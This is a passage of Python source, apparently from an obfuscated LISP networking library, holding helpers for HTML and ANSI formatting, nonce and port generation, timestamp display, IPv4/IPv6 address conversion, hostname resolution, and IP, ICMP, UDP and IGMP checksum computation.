if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
def blue(string, html):
    """Render 'string' in blue: HTML font markup when 'html' is true,
    otherwise an ANSI escape sequence wrapped in bold()."""
    if html:
        return '<font color="blue"><b>{}</b></font>'.format(string)
    return bold("\033[94m" + string + "\033[0m", html)
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
def bold(string, html):
    """Render 'string' in bold: "<b>" markup for HTML output, an ANSI
    bold escape sequence otherwise."""
    if html:
        return "<b>{}</b>".format(string)
    return "\033[1m" + string + "\033[0m"
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
def convert_font(string):
    # Convert embedded ANSI escape sequences in 'string' to the
    # equivalent HTML markup: "[91m"/"[92m"/"[94m" color prefixes and the
    # "[1m" bold prefix, each terminated by "[0m", are replaced by the
    # output of red()/green()/blue()/bold() with html=True.
    i11i1i1I1iI1 = [["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold]]
    O0ooOo0 = "[0m"
    if 53 - 53: OoooooooOO - IiII
    # Pick the first prefix token present in the string; IIIiiiI is the
    # matching HTML-producing function, OoO00oo00 its length.
    for oOo in i11i1i1I1iI1:
        i1i = oOo[0]
        IIIiiiI = oOo[1]
        OoO00oo00 = len(i1i)
        ooo = string.find(i1i)
        if (ooo != - 1): break
    if 76 - 76: OoooooooOO + Oo0Ooo % IiII . OoO0O00 + II111iiii
    if 70 - 70: I1IiiI / I11i
    # Replace every occurrence of that prefix: the text between the
    # prefix and the "[0m" terminator is wrapped in HTML instead.
    # NOTE(review): the tail slice skips OoO00oo00 (prefix length)
    # characters at the terminator rather than len("[0m") -- presumably
    # to also consume an adjacent escape byte produced by the nested
    # bold()-inside-color encoding; confirm before changing.
    while (ooo != - 1):
        IIiiiiIiIIii = string[ooo::].find(O0ooOo0)
        O0OO = string[ooo + OoO00oo00: ooo + IIiiiiIiIIii]
        string = string[: ooo] + IIIiiiI(O0OO, True) + string[ooo + IIiiiiIiIIii + OoO00oo00::]
        if 39 - 39: I1ii11iIi11i + I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo
        ooo = string.find(i1i)
    if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
    if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
    if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
    if 8 - 8: ooOoO0o * O0
    if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
    # Bold sequences may remain (colors are themselves bold-wrapped, see
    # red()/green()/blue()); recurse until none are left.
    if (string.find("[1m") != - 1): string = convert_font(string)
    return (string)
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
def lisp_space(num):
    """Return a string of 'num' ASCII space characters ("" for num <= 0).

    Replaces the original character-by-character concatenation loop,
    which built the string in quadratic time, with str * int.
    """
    return " " * num
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
def lisp_button(string, url):
    """Return HTML for a rounded transparent button labeled 'string'.
    When 'url' is supplied, the button is wrapped in an anchor linking
    to it and padded with two spaces on each side.

    NOTE(review): the style attribute's closing quote comes from the
    quote before type= -- the markup looks unbalanced; confirm browsers
    render it as intended before touching the string.
    """
    opening = ('<button style="background-color:transparent;'
        'border-radius:10px; type="button">')

    if url is None:
        return opening + string + "</button>"

    anchor = '<a href="{}">'.format(url)
    pad = lisp_space(2)
    return pad + anchor + opening + string + "</button></a>" + pad
if 98 - 98: oO0o % IiII * i11iIiiIii % I1ii11iIi11i
if 29 - 29: IiII
if 66 - 66: Oo0Ooo
if 97 - 97: i1IIi - OoooooooOO / I1Ii111 * I1IiiI
if 55 - 55: o0oOOo0O0Ooo . iII111i
if 87 - 87: o0oOOo0O0Ooo % iIii1I11I1II1
if 100 - 100: I1Ii111 . I1IiiI * I1Ii111 - I1IiiI . I11i * Ii1I
def lisp_print_cour(string):
    """Wrap 'string' in Courier New (fixed-width) font markup."""
    return '<font face="Courier New">{}</font>'.format(string)
if 89 - 89: OoO0O00 + IiII * I1Ii111
if 28 - 28: OoooooooOO . oO0o % I1ii11iIi11i / i1IIi / OOooOOo
if 36 - 36: o0oOOo0O0Ooo + I11i - IiII + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
def lisp_print_sans(string):
    """Wrap 'string' in Sans-Serif font markup."""
    return '<font face="Sans-Serif">{}</font>'.format(string)
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
def lisp_span(string, hover_string):
    """Return 'string' inside a <span> whose hover tooltip (title
    attribute) is 'hover_string'."""
    return '<span title="{}">{}</span>'.format(hover_string, string)
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
def lisp_eid_help_hover(output):
    # Attach a hover tooltip to 'output' describing the unicast and
    # multicast EID input formats accepted by the lookup UI.
    # NOTE(review): the tooltip literal's original leading whitespace is
    # not recoverable from this copy of the source; verify layout.
    iiIIii = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
    if 70 - 70: o0oOOo0O0Ooo - OOooOOo
    if 62 - 62: I11i
    O000oOo = lisp_span(output, iiIIii)
    return (O000oOo)
if 53 - 53: iIii1I11I1II1 + o0oOOo0O0Ooo - OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
def lisp_geo_help_hover(output):
    # Attach a hover tooltip to 'output' describing the EID, geo-point,
    # and geo-prefix input formats accepted by the lookup UI.
    # NOTE(review): the tooltip literal's original leading whitespace is
    # not recoverable from this copy of the source; verify layout.
    iiIIii = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
    if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
    if 50 - 50: ooOoO0o + i1IIi
    O000oOo = lisp_span(output, iiIIii)
    return (O000oOo)
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
def space(num):
    """Return a string of 'num' HTML non-breaking spaces ("&#160;").

    Replaces the original character-by-character concatenation loop
    (quadratic in 'num') with str * int. Duplicate of lisp_space() but
    for HTML output.
    """
    return "&#160;" * num
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
def lisp_get_ephemeral_port():
    """Return a random source port in the ephemeral range
    [32768, 65534] (the original randrange() excludes 65535)."""
    return random.randint(32768, 65534)
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
def lisp_get_data_nonce():
    """Return a random 24-bit nonce (0 .. 0xffffff) for LISP data
    encapsulation headers."""
    return random.randrange(0x1000000)
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
def lisp_get_control_nonce():
    """Return a random 64-bit nonce (0 .. 2**64 - 1) for LISP control
    messages."""
    return random.randrange(2 ** 64)
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
def lisp_hex_string(integer_value):
    """Return the hex digits of 'integer_value' without the "0x" prefix
    and without the trailing "L" Python 2 appends to longs."""
    digits = hex(integer_value)[2:]
    if digits.endswith("L"):
        digits = digits[:-1]
    return digits
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
def lisp_get_timestamp():
    """Return the current wall-clock time in seconds since the epoch."""
    now = time.time()
    return now
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
if 65 - 65: II111iiii - I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 * iII111i + Ii1I
if 79 - 79: ooOoO0o . OoOoOO00 % I1Ii111 - Oo0Ooo
def lisp_set_timestamp(seconds):
    """Return an absolute epoch timestamp 'seconds' from now."""
    return seconds + time.time()
if 69 - 69: ooOoO0o - o0oOOo0O0Ooo . ooOoO0o
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
def lisp_print_elapsed(ts):
    """Return "h:mm:ss" elapsed since epoch timestamp 'ts', or "never"
    when 'ts' is 0 or None."""
    if ts == 0 or ts is None:
        return "never"

    elapsed = round(time.time() - ts, 0)
    return str(datetime.timedelta(seconds=elapsed))
if 77 - 77: iIii1I11I1II1 + OoO0O00 . I1ii11iIi11i % OoO0O00
if 93 - 93: O0
if 85 - 85: i11iIiiIii % i11iIiiIii + O0 / OOooOOo
if 89 - 89: Ii1I % i1IIi % oO0o
if 53 - 53: oO0o * OoooooooOO . OoOoOO00
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
def lisp_print_future(ts):
    """Return "h:mm:ss" until epoch timestamp 'ts'; "never" when 'ts'
    is 0, "expired" when 'ts' has already passed."""
    if ts == 0:
        return "never"

    remaining = ts - time.time()
    if remaining < 0:
        return "expired"
    return str(datetime.timedelta(seconds=round(remaining, 0)))
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
if 90 - 90: I1ii11iIi11i . ooOoO0o . OoOoOO00 . Ii1I
if 4 - 4: Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
def lisp_print_eid_tuple(eid, group):
    """Return a display string for an (eid, group) pair: the unicast
    prefix when the group is null, "[iid](*, G)" when the source is a
    wildcard or equal to the group, otherwise the (S,G) form."""
    eid_str = eid.print_prefix()
    if group.is_null():
        return eid_str

    group_str = group.print_prefix()
    iid = group.instance_id

    if eid.is_null() or eid.is_exact_match(group):
        # Drop the "[iid]" prefix from the group string; the instance-id
        # is re-printed explicitly.
        after_bracket = group_str.find("]") + 1
        return "[{}](*, {})".format(iid, group_str[after_bracket::])

    return eid.print_sg(group)
if 31 - 31: Ii1I
if 18 - 18: ooOoO0o + Ii1I
if 5 - 5: OoooooooOO + I11i * II111iiii
if 98 - 98: OOooOOo % i1IIi . I1IiiI . II111iiii . I1ii11iIi11i / i11iIiiIii
if 32 - 32: o0oOOo0O0Ooo + I1IiiI . I1Ii111
if 41 - 41: OoOoOO00 . i11iIiiIii / I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
def lisp_convert_6to4(addr_str):
    """Return the embedded IPv4 address when 'addr_str' is an
    IPv4-mapped IPv6 string ("::ffff:a.b.c.d"); otherwise return
    'addr_str' unchanged."""
    if "::ffff:" not in addr_str:
        return addr_str
    return addr_str.split(":")[-1]
if 28 - 28: o0oOOo0O0Ooo
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if 14 - 14: I1ii11iIi11i + i11iIiiIii
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
if 7 - 7: I1ii11iIi11i - oO0o * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i
if 85 - 85: O0
def lisp_convert_4to6(addr_str):
    """Return a lisp_address holding 'addr_str' as IPv6; a dotted-quad
    IPv4 string is first mapped into "::ffff:a.b.c.d" form."""
    addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    if addr.is_ipv4_string(addr_str):
        addr_str = "::ffff:" + addr_str
    addr.store_address(addr_str)
    return addr
if 32 - 32: OoooooooOO . OoO0O00 / Oo0Ooo * o0oOOo0O0Ooo / o0oOOo0O0Ooo * Ii1I
if 19 - 19: Ii1I
if 55 - 55: OOooOOo % OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
if 71 - 71: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
def lisp_gethostbyname(string):
    # Resolve 'string' to an address string. Literal IPv4 dotted-quads
    # and IPv6 hex-colon strings are returned as-is without a DNS
    # lookup; everything else goes through socket.gethostbyname(), with
    # a getaddrinfo() fallback on Alpine. Returns "" on failure.
    IIi1 = string.split(".")
    OoO0oO = string.split(":")
    Ii = string.split("-")
    if 20 - 20: o0oOOo0O0Ooo * ooOoO0o
    # Dotted string whose first label is numeric: treat as an IPv4
    # literal and return it unchanged.
    if (len(IIi1) > 1):
        if (IIi1[0].isdigit()): return (string)
    if 10 - 10: I11i - Oo0Ooo
    # Colon-separated string with a leading hex group: IPv6 literal.
    if (len(OoO0oO) > 1):
        try:
            int(OoO0oO[0], 16)
            return (string)
        except:
            pass
    if 59 - 59: OoooooooOO * Oo0Ooo + i1IIi
    if 23 - 23: ooOoO0o
    if 13 - 13: iIii1I11I1II1
    if 77 - 77: i11iIiiIii - iIii1I11I1II1 / oO0o / ooOoO0o / OoO0O00
    if 56 - 56: OoooooooOO * O0
    if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
    if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
    # Probe "xxxx-xxxx-xxxx" (MAC-notation) strings for hex groups.
    # NOTE(review): the loop's outcome is never used -- the code falls
    # through to DNS resolution either way; looks like a missing
    # "return" was dropped here. Confirm against upstream lisp.py.
    if (len(Ii) == 3):
        for IiIIi1IiiIiI in range(3):
            try: int(Ii[IiIIi1IiiIiI], 16)
            except: break
    if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
    if 65 - 65: oO0o + OoOoOO00 + II111iiii
    if 77 - 77: II111iiii
    # Regular DNS lookup. On failure, give up ("") unless running on
    # Alpine, where the getaddrinfo() fallback below is tried.
    try:
        IiiIIi1 = socket.gethostbyname(string)
        return (IiiIIi1)
    except:
        if (lisp_is_alpine() == False): return ("")
    if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
    if 68 - 68: oO0o
    if 10 - 10: Ii1I
    if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
    if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
    # Alpine fallback: accept the getaddrinfo() result only when its
    # canonical name entry round-trips to the requested string.
    try:
        IiiIIi1 = socket.getaddrinfo(string, 0)[0]
        if (IiiIIi1[3] != string): return ("")
        IiiIIi1 = IiiIIi1[4][0]
    except:
        IiiIIi1 = ""
    if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
    return (IiiIIi1)
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
def lisp_ip_checksum(data, hdrlen=20):
    """Compute the IPv4 header checksum over the first 'hdrlen' bytes of
    'data' and return 'data' with bytes 10-11 replaced by the checksum.
    'data' is returned unmodified (after a log message) when shorter
    than 'hdrlen'."""
    if len(data) < hdrlen:
        lprint("IPv4 packet too short, length {}".format(len(data)))
        return data

    # Sum the header as 16-bit words via its hex encoding (4 hex digits
    # per word, hdrlen * 2 hex digits total).
    hexed = binascii.hexlify(data)
    total = 0
    for offset in range(0, hdrlen * 2, 4):
        total += int(hexed[offset: offset + 4], 16)

    # Fold the carries, take the one's complement, and convert to
    # network byte order.
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    checksum = struct.pack("H", socket.htons(~total & 0xffff))

    # Splice the checksum into the header checksum field (offset 10).
    return data[0:10] + checksum + data[12::]
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
def lisp_icmp_checksum(data):
    """Compute an ICMP checksum over the first 18 bytes of 'data'
    (36 hex digits) and return 'data' with bytes 2-3 (the ICMP checksum
    field) replaced. 'data' is returned unmodified (after a log
    message) when shorter than 36 bytes."""
    if len(data) < 36:
        lprint("ICMP packet too short, length {}".format(len(data)))
        return data

    # Sum 16-bit words via the hex encoding; range(0, 36, 4) covers the
    # first 18 bytes of the message.
    hexed = binascii.hexlify(data)
    total = 0
    for offset in range(0, 36, 4):
        total += int(hexed[offset: offset + 4], 16)

    # Fold carries, complement, convert to network byte order.
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    checksum = struct.pack("H", socket.htons(~total & 0xffff))

    return data[0:2] + checksum + data[4::]
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
if 29 - 29: iIii1I11I1II1 - OoO0O00 + I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
def lisp_udp_checksum(source, dest, data):
    """Compute the UDP checksum over an IPv6 pseudo-header (source and
    dest addresses, UDP length, next-header = UDP) plus 'data', and
    return 'data' with the checksum inserted at bytes 6-7 (the UDP
    checksum field)."""
    # Build the IPv6 pseudo-header.
    src = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
    dst = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
    udp_length = socket.htonl(len(data))
    next_header = socket.htonl(LISP_UDP_PROTOCOL)
    pseudo = src.pack_address()
    pseudo += dst.pack_address()
    pseudo += struct.pack("II", udp_length, next_header)

    # Hex-encode pseudo-header + payload and zero-pad to a whole number
    # of 16-bit words (4 hex digits).
    hexed = binascii.hexlify(pseudo + data)
    for _ in range(0, len(hexed) % 4):
        hexed += "0"

    # One's-complement sum of all 16-bit words.
    total = 0
    for offset in range(0, len(hexed), 4):
        total += int(hexed[offset: offset + 4], 16)

    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    checksum = struct.pack("H", socket.htons(~total & 0xffff))

    return data[0:6] + checksum + data[8::]
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
def lisp_igmp_checksum(igmp):
    """Compute the IGMP checksum over the first 12 bytes of 'igmp'
    (24 hex digits) and return the message with the checksum stored at
    bytes 2-3 (the IGMP checksum field)."""
    hexed = binascii.hexlify(igmp)

    # One's-complement sum of the six 16-bit words.
    total = 0
    for offset in range(0, 24, 4):
        total += int(hexed[offset: offset + 4], 16)

    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    checksum = struct.pack("H", socket.htons(~total & 0xffff))

    return igmp[0:2] + checksum + igmp[4::]
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
